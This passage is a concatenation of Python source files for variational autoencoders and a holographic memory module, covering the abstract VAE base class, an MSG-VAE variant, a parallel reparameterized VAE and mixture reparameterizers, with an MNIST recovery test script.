''' initial generation of random perms '''
self.perms, self.inv_perms = self._generate_perms_and_inverses(
feature_size, self.num_memories
)
keys = self.normalize(keys)
permed_keys = torch.cat([keys[:, perm] for perm in self.perms], 0)
conv_output = self.conv_fn(permed_keys,
values.repeat([self.num_memories, 1]),
cuda=self.cuda)
self.memories = self.memories + conv_output if self.memories is not None else conv_output
def extend_memory(self, batch_size, feature_size, num_to_extend):
if num_to_extend < 1:
return
new_perms, new_inv_perms = self._generate_perms_and_inverses(
feature_size, num_to_extend
)
self.perms.extend(new_perms)
self.inv_perms.extend(new_inv_perms)
if self.memories is not None:
zero_vectors = float_type(self.cuda)(batch_size*num_to_extend, feature_size).zero_()
self.memories = torch.cat([self.memories, zero_vectors], 0)
self.num_memories += num_to_extend
def decode(self, keys):
'''
Decodes values out of the memories
keys: [batch_size, feature_size]
returns: [batch, features]
'''
keys = self.normalize(keys)
batch_size = keys.size(0)
# re-gather keys to avoid mixing between different keys.
permed_keys = torch.cat([keys[:, perm] for perm in self.perms], 0)
unsplit_conv = self.conv_fn(permed_keys, self.memories, conj=False, cuda=self.cuda)
indices = [[i for i in range(j, self.num_memories*batch_size, batch_size)]
for j in range(batch_size)]
return torch.cat([torch.sum(unsplit_conv[ind], 0) for ind in indices], 0)
if __name__ == "__main__":
# simple test on MNIST recovery
import argparse
import torchvision
from torchvision import datasets, transforms
parser = argparse.ArgumentParser(description='HolographicMemory MNIST Recovery')
# Task parameters
parser.add_argument('--key-type', type=str, default='gaussian',
help="type of key: gaussian or onehot (default: gaussian)")
parser.add_argument('--batch-size', type=int, default=10,
help="batch size (default: 10)")
parser.add_argument('--batches-to-encode', type=int, default=10,
help="how many minibatches to encode (default: 10)")
parser.add_argument('--num-memories', type=int, default=10,
help="number of memory traces (default: 10)")
parser.add_argument('--increment-memories-per-batch', type=int, default=0,
help="number of memory traces to increase per batch (default: 0)")
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
feature_size = 784
mnist = torch.utils.data.DataLoader(
datasets.MNIST('.datasets', train=True, download=True, transform=transforms.ToTensor()),
batch_size=args.batch_size,
drop_last=True,
shuffle=True,
)
# build memory and some random keys
memory = HolographicMemory(num_init_memories=args.num_memories,
normalization='complex', cuda=args.cuda)
if args.key_type == 'gaussian':
keys = [torch.randn(args.batch_size, feature_size)
for _ in range(args.batches_to_encode)]
else:
rv = torch.distributions.OneHotCategorical(probs=torch.rand(args.batch_size, feature_size))
keys = [rv.sample() for _ in range(args.batches_to_encode)]
if args.cuda:
keys = [k.cuda() for k in keys]
# encode some images
img_container, key_container = [], []
for i, (img, lbl) in enumerate(mnist):
if i > args.batches_to_encode - 1:
break
img, lbl = img.cuda() if args.cuda else img, lbl.cuda() if args.cuda else lbl
img_container.append(img)
memory.encode(keys[i], img.view(args.batch_size, -1))
# lbl = lbl.unsqueeze(1) if lbl.dim() < 2 else lbl
# key_container.append(one_hot(feature_size, lbl, True).type(float_type(True)))
# print(img.size(), lbl.size(), key_container[-1].size())
# memory.encode(key_container[-1], img.view(args.batch_size, -1))
# expand_mem if requested
memory.extend_memory(args.batch_size, feature_size, args.increment_memories_per_batch)
img_container = torch.cat(img_container, 0)
# keys = torch.cat(key_container, 0)
# print("key container post = ", keys.size())
print("encoded {} samples x {} --> {}".format(
args.batch_size, list(img.size()), list(memory.memories.size())))
# try to decode
values = torch.cat([memory.decode(key) for key in keys], 0)
print("decoded {} keys --> {}".format(
list(torch.cat(keys, 0).size()), values.size()))
# save image for visualization
grid = torchvision.utils.make_grid(
torch.cat([img_container, values.view(-1, 1, 28, 28)], 0),
nrow=args.batch_size, normalize=True, scale_each=True
)
def show(img):
import matplotlib.pyplot as plt
npimg = img.cpu().numpy()
plt.imshow(np.transpose(npimg, (1,2,0)), interpolation='nearest')
plt.show()
show(grid)
``` |
{
"source": "jramapuram/vae",
"score": 3
} |
#### File: jramapuram/vae/abstract_vae.py
```python
from __future__ import print_function
import tree
import numpy as np
import torch
import torch.nn as nn
from copy import deepcopy
from torch.autograd import Variable
from collections import OrderedDict
import helpers.utils as utils
import helpers.layers as layers
import helpers.distributions as distributions
class VarianceProjector(nn.Module):
def __init__(self, nll_type_str):
""" A single scalar (learnable) variance.
:param nll_type_str: string describing negative log-likelihood type.
:returns: object
:rtype: object
"""
super(VarianceProjector, self).__init__()
# build the sequential layer
if distributions.nll_has_variance(nll_type_str):
self.register_parameter(
"variance_scalar",
nn.Parameter(torch.zeros(1))
)
def forward(self, x):
if hasattr(self, 'variance_scalar'):
return torch.cat([x, self.variance_scalar.expand_as(x)], 1)
return x
class AbstractVAE(nn.Module):
def __init__(self, input_shape, **kwargs):
""" Abstract base class for VAE.
:param input_shape: the input tensor shape
:returns: instantiation of object
:rtype: object
"""
super(AbstractVAE, self).__init__()
self.input_shape = input_shape
self.is_color = input_shape[0] > 1
self.chans = 3 if self.is_color else 1
self.config = kwargs['kwargs']
# keep track of the amortized posterior
self.aggregate_posterior = layers.EMA(self.config['aggregate_posterior_ema_decay'])
# Setup the cyclic annealing object if required.
self.kl_annealer = self.build_kl_annealer()
def get_reparameterizer_scalars(self):
""" return the reparameterization scalars (eg: tau in gumbel)
:returns: a dict of scalars
:rtype: dict
"""
return self.reparameterizer.get_reparameterizer_scalars()
def build_kl_annealer(self):
"""Helper to build a KL annealer (if requred in argparse)."""
kl_annealer = None
klc = self.config['kl_annealing_cycles']
if klc is not None and klc > 0:
ten_percent_of_epochs_as_steps = int(self.config['epochs'] * 0.1) * self.config['steps_per_train_epoch']
total_cycles = self.config['total_train_steps'] / self.config['kl_annealing_cycles']
# print("steps_per_epoch = {} | total_steps = {} | total_cycles = {} | 10% steps = {}".format(
# self.config['steps_per_epoch'],
# self.config['total_steps'],
# total_cycles, ten_percent_of_epochs_as_steps))
# Linear warmup with fixed rate; generally performs worse than cosine-annealing below.
# self.kl_annealer = layers.LinearWarmupWithFixedInterval(
# fixed_steps=int(np.ceil((total_cycles + 1) * 0.3)), # Use 90% for base kl-beta
# warmup_steps=int(np.floor((total_cycles + 1) * 0.7)) # Use 10% for linear warmup
# )
kl_annealer = layers.LinearWarmupWithCosineAnnealing(
decay_steps=int(total_cycles * 0.9), # Use 90% for cos-anneal.
warmup_steps=int(total_cycles * 0.1), # Use 10% for linear warmup.
total_steps=self.config['total_train_steps'], # Total steps for model.
constant_for_last_k_steps=ten_percent_of_epochs_as_steps # Constant steps at end.
)
print("\nKL-Annealer: {}\n".format(kl_annealer))
return kl_annealer
def build_encoder(self):
""" helper to build the encoder type
:returns: an encoder
:rtype: nn.Module
"""
encoder = layers.get_encoder(**self.config)(
output_size=self.reparameterizer.input_size
)
print('encoder has {} parameters\n'.format(utils.number_of_parameters(encoder) / 1e6))
return torch.jit.script(encoder) if self.config['jit'] else encoder
def build_decoder(self, reupsample=True):
""" helper function to build convolutional or dense decoder
:returns: a decoder
:rtype: nn.Module
"""
dec_conf = deepcopy(self.config)
if dec_conf['nll_type'] == 'pixel_wise':
dec_conf['input_shape'][0] *= 256
decoder = layers.get_decoder(output_shape=dec_conf['input_shape'], **dec_conf)(
input_size=self.reparameterizer.output_size
)
print('decoder has {} parameters\n'.format(utils.number_of_parameters(decoder) / 1e6))
# append the variance as necessary
decoder = self._append_variance_projection(decoder)
return torch.jit.script(decoder) if self.config['jit'] else decoder
def _append_variance_projection(self, decoder):
""" Appends a decoder variance for gaussian, etc.
:param decoder: the nn.Module
:returns: appended variance projector to decoder
:rtype: nn.Module
"""
if distributions.nll_has_variance(self.config['nll_type']):
# add the variance projector (if we are in that case for the NLL)
# warnings.warn("\nCurrently variance is not being added to p(x|z)\ --> using mean. \n")
print("adding variance projector for {} log-likelihood".format(self.config['nll_type']))
decoder = nn.Sequential(
decoder,
VarianceProjector(self.config['nll_type'])
)
return decoder
def compile_full_model(self):
""" Takes all the submodules and module-lists
and returns one gigantic sequential_model
:returns: None
:rtype: None
"""
full_model_list, _ = layers.flatten_layers(self)
return nn.Sequential(OrderedDict(full_model_list))
def reparameterize_aggregate_posterior(self):
""" Gets reparameterized aggregate posterior samples
:returns: reparameterized tensor
:rtype: torch.Tensor
"""
training_tmp = self.reparameterizer.training
self.reparameterizer.train(True)
enumerated_labels = torch.arange(
self.config['output_size'], device='cuda:0' if self.config['cuda'] else 'cpu')
z_samples, _ = self.reparameterize(self.aggregate_posterior.ema_val, labels=enumerated_labels)
self.reparameterizer.train(training_tmp)
return z_samples
def generate_synthetic_samples(self, batch_size, **kwargs):
""" Generates samples with VAE.
:param batch_size: the number of samples to generate.
:returns: decoded logits
:rtype: torch.Tensor
"""
def generate_single_batch(batch_size):
if kwargs.get('use_aggregate_posterior', False):
z_samples = self.reparameterize_aggregate_posterior()
else:
z_samples = self.reparameterizer.prior(
batch_size, scale_var=self.config['generative_scale_var'], **kwargs
)
# in the normal case just decode and activate
return self.nll_activation(self.decode(z_samples))
full_generations, num_generated = [], 0
def detach_to_cpu(t): return t.detach().cpu() # move the tensor to cpu memory
while num_generated < batch_size:
gen = tree.map_structure(
detach_to_cpu, generate_single_batch(self.config['batch_size']))
full_generations.append(gen)
num_generated += gen.shape[0] # add number generated
def reduce_to_requested(t): return t[-batch_size:]
return tree.map_structure(reduce_to_requested, full_generations)
def generate_synthetic_sequential_samples(self, num_original_discrete, num_rows=8):
""" Iterates over all discrete positions and generates samples (for mix or disc only).
:param num_original_discrete: The original discrete size (useful for LLVAE).
:param num_rows: for visdom
:returns: decoded logits
:rtype: torch.Tensor
"""
assert self.has_discrete()
# create a grid of one-hot vectors for displaying in visdom
# uses one row for original dimension of discrete component
discrete_indices = np.array([np.random.randint(begin, end, size=num_rows) for begin, end in
zip(range(0, self.reparameterizer.config['discrete_size'],
num_original_discrete),
range(num_original_discrete,
self.reparameterizer.config['discrete_size'] + 1,
num_original_discrete))])
discrete_indices = discrete_indices.reshape(-1)
self.eval() # lock BN / Dropout, etc
with torch.no_grad():
z_samples = Variable(
torch.from_numpy(utils.one_hot_np(self.reparameterizer.config['discrete_size'],
discrete_indices))
)
z_samples = z_samples.type(utils.same_type(self.config['half'], self.config['cuda']))
if self.config['reparam_type'] == 'mixture' and self.config['vae_type'] != 'sequential':
''' add in the gaussian prior '''
z_cont = self.reparameterizer.continuous.prior(z_samples.size(0))
z_samples = torch.cat([z_cont, z_samples], dim=-1)
# the below is to handle the issues with BN
# pad the z to be full batch size
number_to_return = z_samples.shape[0] # original generate number
number_batches_z = int(max(1, np.ceil(
float(self.config['batch_size']) / float(number_to_return))))
z_padded = torch.cat(
[z_samples for _ in range(number_batches_z)], 0
)[0:self.config['batch_size']]
# generate and return the requested number
number_batches_to_generate = int(max(1, np.ceil(
float(number_to_return) / float(self.config['batch_size']))))
generated = torch.cat([self.generate_synthetic_samples(
self.config['batch_size'], z_samples=z_padded
) for _ in range(number_batches_to_generate)], 0)
return generated[0:number_to_return] # only return num_requested
def nll_activation(self, logits):
""" Activates the logits
:param logits: the unactivated logits
:returns: activated logits.
:rtype: torch.Tensor
"""
return distributions.nll_activation(logits,
self.config['nll_type'],
chans=self.chans)
def forward(self, x, labels=None):
"""Accepts input (and optionally labels), gets posterior and latent and decodes.
:param x: input tensor.
:param labels: (optional) labels
:returns: decoded logits and reparam dict
:rtype: torch.Tensor, dict
"""
z, params = self.posterior(x, labels=labels)
decoded_logits = self.decode(z)
params = self._compute_mi_params(decoded_logits, params)
return decoded_logits, params
def likelihood(self, loader, K=1000):
""" Likelihood by integrating ELBO.
TODO(jramapuram): move loader out.
:param loader: the data loader to iterate over.
:param K: number of importance samples.
:returns: likelihood produced by monte-carlo integration of elbo.
:rtype: float32
"""
with torch.no_grad():
likelihood = []
for num_minibatches, (minibatch, labels) in enumerate(loader):
minibatch, labels = [minibatch.cuda() if self.config['cuda'] else minibatch,
labels.cuda() if self.config['cuda'] else labels]
z_logits = self.encode(minibatch) # we only need to encode once
batch_size = z_logits.shape[0]
for idx in range(batch_size):
z_logits_i = z_logits[idx].expand_as(z_logits).contiguous()
sample_i = minibatch[idx].expand_as(minibatch).contiguous()
label_i = labels[idx].expand_as(labels).contiguous()
elbo = []
for count in range(K // batch_size):
z, params = self.reparameterize(z_logits_i, labels=label_i)
decoded_logits = self.decode(z)
loss_t = self.loss_function(decoded_logits, sample_i, params=params)
elbo.append(loss_t['elbo'])
# compute the log-sum-exp of the elbo of the single sample taken over K replications
multi_sample_elbo = torch.cat([e.unsqueeze(0) for e in elbo], 0).view([-1])
likelihood.append(torch.logsumexp(multi_sample_elbo, dim=0) - np.log(count + 1))
return torch.mean(torch.cat([l.unsqueeze(0) for l in likelihood], 0))
def compute_kl_beta(self, kl_beta_list):
"""Compute the KL-beta term using an annealer or just returns.
:param kl_beta_list: a list of kl-beta values to scale
:returns: scalar float32
:rtype: float32
"""
if self.kl_annealer is not None:
kl_beta_list = self.kl_annealer(kl_beta_list)
return kl_beta_list
def loss_function(self, recon_x, x, params, K=1, **extra_loss_terms):
""" Produces ELBO.
:param recon_x: the unactivated reconstruction preds.
:param x: input tensor.
:param params: the dict of reparameterization.
:param K: number of monte-carlo samples to use.
:param extra_loss_terms: kwargs of extra [B] dimensional losses
:returns: loss dict
:rtype: dict
"""
nll = self.nll(x, recon_x, self.config['nll_type'])
# multiple monte-carlo samples for the decoder.
if self.training:
for k in range(1, K):
z_k, params_k = self.reparameterize(logits=params['logits'],
labels=params.get('labels', None))
recon_x_i = self.decode(z_k)
nll = nll + self.nll(x, recon_x_i, self.config['nll_type'])
nll = nll / K
kld = self.kld(params)
elbo = nll + kld # save the base ELBO, but use the beta-vae elbo for the full loss
# handle the mutual information term
mut_info = self.mut_info(params, x.size(0))
# get the kl-beta from the annealer or just set to fixed value
kl_beta = self.compute_kl_beta([self.config['kl_beta']])[0]
# sanity checks are only done in fp32 due to too much fp16 magic
if not self.config['half']:
utils.nan_check_and_break(nll, "nll")
if kl_beta > 0: # only check if we have a KLD
utils.nan_check_and_break(kld, "kld")
# if we are provided additional losses add them together
additional_losses = torch.sum(
torch.cat([v.unsqueeze(0) for v in extra_loss_terms.values()], 0), 0) \
if extra_loss_terms else torch.zeros_like(nll)
# compute full loss to use for optimization
loss = (nll + additional_losses + kl_beta * kld) - mut_info
return {
'loss': loss,
'elbo': elbo,
'loss_mean': torch.mean(loss),
'elbo_mean': torch.mean(elbo),
'nll_mean': torch.mean(nll),
'kld_mean': torch.mean(kld),
'additional_loss_mean': torch.mean(additional_losses),
'kl_beta_scalar': kl_beta,
'mut_info_mean': torch.mean(mut_info)
}
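# Note (descriptive): the optimized objective is
#   loss = NLL + extra_losses + kl_beta * KL - mut_info
# while 'elbo' keeps the un-scaled NLL + KL, which likelihood() integrates over.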
def has_discrete(self):
""" returns True if the model has a discrete
as it's first (in the case of parallel) reparameterizer
:returns: True/False
:rtype: bool
"""
return self.reparameterizer.is_discrete
def reparameterize(self, logits, labels=None, force=False):
""" Reparameterize the logits and returns a dict.
:param logits: unactivated encoded logits.
:param labels: (optional) labels
:param force: force reparameterize the distributions
:returns: reparam dict
:rtype: dict
"""
return self.reparameterizer(logits, force=force)
def decode(self, z):
""" Decode a latent z back to x.
:param z: the latent tensor.
:returns: decoded logits (unactivated).
:rtype: torch.Tensor
"""
decoded_logits = self.decoder(z.contiguous())
return decoded_logits
def posterior(self, x, labels=None, force=False):
""" get a reparameterized Q(z|x) for a given x
:param x: input tensor
:param labels: (optional) labels
:param force: force reparameterization
:returns: reparam dict
:rtype: torch.Tensor
"""
z_logits = self.encode(x) # encode logits
self.aggregate_posterior(z_logits) # aggregate posterior EMA
return self.reparameterize(z_logits, labels=labels, force=force) # return reparameterized value
def encode(self, x):
""" Encodes a tensor x to a set of logits.
:param x: the input tensor
:returns: logits
:rtype: torch.Tensor
"""
encoded = self.encoder(x).squeeze()
if encoded.dim() < 2:
return encoded.unsqueeze(-1)
return encoded
def kld(self, dist_a):
""" KL-Divergence of the distribution dict and the prior of that distribution.
:param dist_a: the distribution dict.
:returns: tensor that is of dimension batch_size
:rtype: torch.Tensor
"""
return self.reparameterizer.kl(dist_a)
def nll(self, x, recon_x, nll_type):
""" Grab the negative log-likelihood for a specific NLL type
:param x: the true tensor
:param recon_x: the reconstruction tensor
:param nll_type: the NLL type (str)
:returns: [B] dimensional tensor
:rtype: torch.Tensor
"""
return distributions.nll(x, recon_x, nll_type)
def _clamp_mut_info(self, mut_info):
""" helper to clamp the mutual information according to a predefined strategy
:param mut_info: the tensor of mut-info
:returns: clamped mut-info
:rtype: torch.Tensor
"""
mut_clamp_strategy_map = { # Clamping strategies
'none': lambda mut_info: mut_info,
'norm': lambda mut_info: mut_info / torch.norm(mut_info, p=2),
'clamp': lambda mut_info: torch.clamp(mut_info,
min=-self.config['mut_clamp_value'],
max=self.config['mut_clamp_value'])
}
return mut_clamp_strategy_map[self.config['mut_clamp_strategy'].strip().lower()](mut_info)
def _compute_mi_params(self, recon_x_logits, params):
""" Internal helper to compute the MI params and append to full params
:param recon_x: reconstruction
:param params: the original params
:returns: original params OR param + MI_params
:rtype: dict
"""
if self.config.get('continuous_mut_info', 0) > 0 or self.config.get('discrete_mut_info', 0) > 0:
_, q_z_given_xhat_params = self.posterior(self.nll_activation(recon_x_logits))
return {**params, 'q_z_given_xhat': q_z_given_xhat_params}
# base case, no MI
return params
def mut_info(self, dist_params, batch_size):
""" Returns mutual information between z <-> x
:param dist_params: the distribution dict
:returns: tensor of dimension batch_size
:rtype: torch.Tensor
"""
mut_info = utils.same_type(self.config['half'], self.config['cuda'])(batch_size).zero_()
# only grab the mut-info if the scalars above are set
if self.config.get('continuous_mut_info', 0) > 0 or self.config.get('discrete_mut_info', 0) > 0:
mut_info = self._clamp_mut_info(self.reparameterizer.mutual_info(dist_params))
return mut_info
def get_activated_reconstructions(self, reconstr):
""" Returns activated reconstruction
:param reconstr: unactivated reconstr logits
:returns: activated reconstr
:rtype: torch.Tensor
"""
return {'reconstruction_imgs': self.nll_activation(reconstr)}
```
#### File: jramapuram/vae/msg.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
from .reparameterizers import get_reparameterizer
from .abstract_vae import AbstractVAE
class MSGVAE(AbstractVAE):
def __init__(self, input_shape, **kwargs):
""" Implements a VAE which decodes many samples and averages outputs.
:param input_shape: the input shape
:returns: an object of MSG-VAE
:rtype: MSGVAE
"""
super(MSGVAE, self).__init__(input_shape, **kwargs)
self.reparameterizer = get_reparameterizer(self.config['reparam_type'])(config=self.config)
# build the encoder and decoder
self.encoder = self.build_encoder()
self.decoder = self.build_decoder()
# build the gates
self.gates = nn.ModuleList([self.build_decoder() for i in range(self.config['max_time_steps'])])
# over-ride the reparam prior
self.single_prior = self.reparameterizer.prior
self.reparameterizer.prior = self._prior_override
def _prior_override(self, batch_size, **kwargs):
""" Helper to generate many samples from the true prior
:param batch_size: the batch size to generate samples for
:returns: a list of priors
:rtype: [torch.Tensor]
"""
return [self.single_prior(batch_size, **kwargs) for _ in range(self.config['max_time_steps'])]
def kld(self, dist_list):
""" KL-Divergence of the distribution dict and the prior of that distribution.
NOTE: we use the last one because we calculate the analytical KL divergence
which only necessitates the parameters of the distribution.
:param dist_list: the list of distributions.
:returns: tensor that is of dimension batch_size
:rtype: torch.Tensor
"""
return self.reparameterizer.kl(dist_list[-1])
def reparameterize(self, logits, force=False):
""" Reparameterize the logits and returns a dict.
:param logits: unactivated encoded logits.
:returns: reparam dict
:rtype: dict
"""
z_list, params_list = [], []
for _ in range(self.config['max_time_steps']):
z, params = self.reparameterizer(logits, force=force)
z_list.append(z)
params_list.append(params)
return z_list, params_list
def decode(self, z, x=None):
""" Decode a set of latent z back to x_mean.
:param z: the latent tensor.
:returns: decoded logits (unactivated).
:rtype: torch.Tensor
"""
assert isinstance(z, (list, tuple)), "expecting a tuple or list"
if self.training:
gate_encodes = [torch.sigmoid(g(z_i)) for g, z_i in zip(self.gates, z)]
return torch.mean(torch.cat([(g_i * self.decoder(z_i.contiguous())).unsqueeze(0)
for z_i, g_i in zip(z, gate_encodes)], 0), 0)
# At inference just return a single sample
# return torch.sigmoid(self.gates[0](z[0])) * self.decoder(z[0].contiguous())
return self.decoder(z[0].contiguous())
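# Design note: during training the reconstruction is a sigmoid-gated average over
# 'max_time_steps' decoded latent samples; at inference only the first sample is
# decoded (ungated), as per the return above.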
```
#### File: jramapuram/vae/parallelly_reparameterized_vae.py
```python
from __future__ import print_function
from .abstract_vae import AbstractVAE
from .reparameterizers.concat_reparameterizer import ConcatReparameterizer
class ParallellyReparameterizedVAE(AbstractVAE):
def __init__(self, input_shape, reparameterizer_strs=["bernoulli", "isotropic_gaussian"], **kwargs):
""" Implements a parallel (in the case of mixture-reparam) VAE
:param input_shape: the input shape
:returns: an object of AbstractVAE
:rtype: AbstractVAE
"""
super(ParallellyReparameterizedVAE, self).__init__(input_shape, **kwargs)
self.reparameterizer_strs = reparameterizer_strs
self.reparameterizer = ConcatReparameterizer(reparameterizer_strs, self.config)
# build the encoder and decoder here because of sizing
self.encoder = self.build_encoder()
self.decoder = self.build_decoder()
def _compute_mi_params(self, recon_x_logits, params_list):
""" Internal helper to compute the MI params and append to full params
:param recon_x: reconstruction
:param params: the original params
:returns: original params OR param + MI_params
:rtype: dict
"""
if self.config['continuous_mut_info'] > 0 or self.config['discrete_mut_info'] > 0:
_, q_z_given_xhat_params_list = self.posterior(self.nll_activation(recon_x_logits))
for param, q_z_given_xhat in zip(params_list, q_z_given_xhat_params_list):
param['q_z_given_xhat'] = q_z_given_xhat
return params_list
# base case, no MI
return params_list
```
#### File: vae/reparameterizers/__init__.py
```python
from .beta import Beta
from .mixture import Mixture
from .bernoulli import Bernoulli
from .gumbel import GumbelSoftmax
from .isotropic_gaussian import IsotropicGaussian
from .concat_reparameterizer import ConcatReparameterizer
from .sequential_reparameterizer import SequentialReparameterizer
from .flow import FlowReparameterizer
reparam_dict = {
'flow': FlowReparameterizer,
'beta': Beta,
'bernoulli': Bernoulli,
'discrete': GumbelSoftmax,
'isotropic_gaussian': IsotropicGaussian,
'mixture': Mixture,
'concat': ConcatReparameterizer,
'sequential': SequentialReparameterizer
}
def get_reparameterizer(reparam_type_str):
""" Returns a reparameterizer type based on the string
:param reparam_type_str: the type of reparam
:returns: a reparam object
:rtype: nn.Module
"""
assert reparam_type_str in reparam_dict, "Unknown reparameterizer requested: {}".format(
reparam_type_str)
return reparam_dict[reparam_type_str]
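# Usage sketch (the config keys below are assumptions; each reparameterizer
# documents its own required configuration):
#   Reparam = get_reparameterizer('isotropic_gaussian')
#   reparameterizer = Reparam(config={'continuous_size': 64, 'cuda': False})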
def is_module_a_reparameterizer(module):
"""Returns true if the provided torch module is a reparamterizer
:param module: nn.Module, etc.
:returns: true or false
:rtype: bool
"""
module_types = tuple(reparam_dict.values())
return isinstance(module, module_types)
```
#### File: vae/reparameterizers/mixture.py
```python
from __future__ import print_function
import warnings
import torch
import torch.nn as nn
from helpers.utils import nan_check_and_break
from .beta import Beta
from .gumbel import GumbelSoftmax
from .isotropic_gaussian import IsotropicGaussian
class Mixture(nn.Module):
''' continuous + discrete reparameterization '''
def __init__(self, config, is_beta=False):
super(Mixture, self).__init__()
warnings.warn("\n\nMixture is depricated, use concat_reparam or sequential_reparam.\n")
self.config = config
self.is_beta = is_beta
self.is_discrete = True
self.num_discrete_input = self.config['discrete_size']
self.num_continuous_input = self.config['continuous_size']
# setup the continuous & discrete reparameterizer
self.continuous = IsotropicGaussian(config) if not is_beta else Beta(config)
self.discrete = GumbelSoftmax(config)
self.input_size = self.num_continuous_input + self.num_discrete_input
self.output_size = self.discrete.output_size + self.continuous.output_size
def get_reparameterizer_scalars(self):
""" Returns any scalars used in reparameterization.
:returns: dict of scalars
:rtype: dict
"""
return self.discrete.get_reparameterizer_scalars()
def prior_params(self, batch_size, **kwargs):
""" Helper to get prior parameters
:param batch_size: the size of the batch
:returns: a dictionary of parameters
:rtype: dict
"""
cont_params = self.continuous.prior_params(batch_size, **kwargs)
disc_params = self.discrete.prior_params(batch_size, **kwargs)
return {
**disc_params,
**cont_params
}
def prior_distribution(self, batch_size, **kwargs):
""" get a torch distrbiution prior
:param batch_size: size of the prior
:returns: uniform categorical
:rtype: torch.distribution
"""
disc_dist = self.discrete.prior_distribution(batch_size, **kwargs)
cont_dist = self.continuous.prior_distribution(batch_size, **kwargs)
return {
'continuous': cont_dist,
'discrete': disc_dist
}
def prior(self, batch_size, **kwargs):
disc = self.discrete.prior(batch_size, **kwargs)
cont = self.continuous.prior(batch_size, **kwargs)
return torch.cat([cont, disc], 1)
def mutual_info(self, params):
dinfo = self.discrete.mutual_info(params)
cinfo = self.continuous.mutual_info(params)
return dinfo - cinfo
def log_likelihood(self, z, params):
cont = self.continuous.log_likelihood(z[:, 0:self.continuous.output_size], params)
disc = self.discrete.log_likelihood(z[:, self.continuous.output_size:], params)
if disc.dim() < 2:
disc = disc.unsqueeze(-1)
# sanity check and return
nan_check_and_break(cont, 'cont_ll')
nan_check_and_break(disc, 'disc_ll')
return torch.cat([cont, disc], 1)
def reparameterize(self, logits, force=False):
continuous_logits = logits[:, 0:self.num_continuous_input]
discrete_logits = logits[:, self.num_continuous_input:]
continuous_reparam, continuous_params = self.continuous(continuous_logits, force=force)
discrete_reparam, disc_params = self.discrete(discrete_logits, force=force)
merged = torch.cat([continuous_reparam, discrete_reparam], -1)
# use a separate key for gaussian or beta
continuous_value = continuous_params['gaussian'] if not self.is_beta else continuous_params['beta']
continuous_key = 'gaussian' if not self.is_beta else 'beta'
params = {continuous_key: continuous_value,
'discrete': disc_params['discrete'],
'logits': logits,
'z': merged}
return merged, params
def kl(self, dist_a, prior=None):
continuous_kl = self.continuous.kl(dist_a, prior)
disc_kl = self.discrete.kl(dist_a, prior)
assert continuous_kl.shape == disc_kl.shape, "need to reduce kl to [#batch] before mixture"
return continuous_kl + disc_kl
def forward(self, logits, force=False):
return self.reparameterize(logits, force=force)
``` |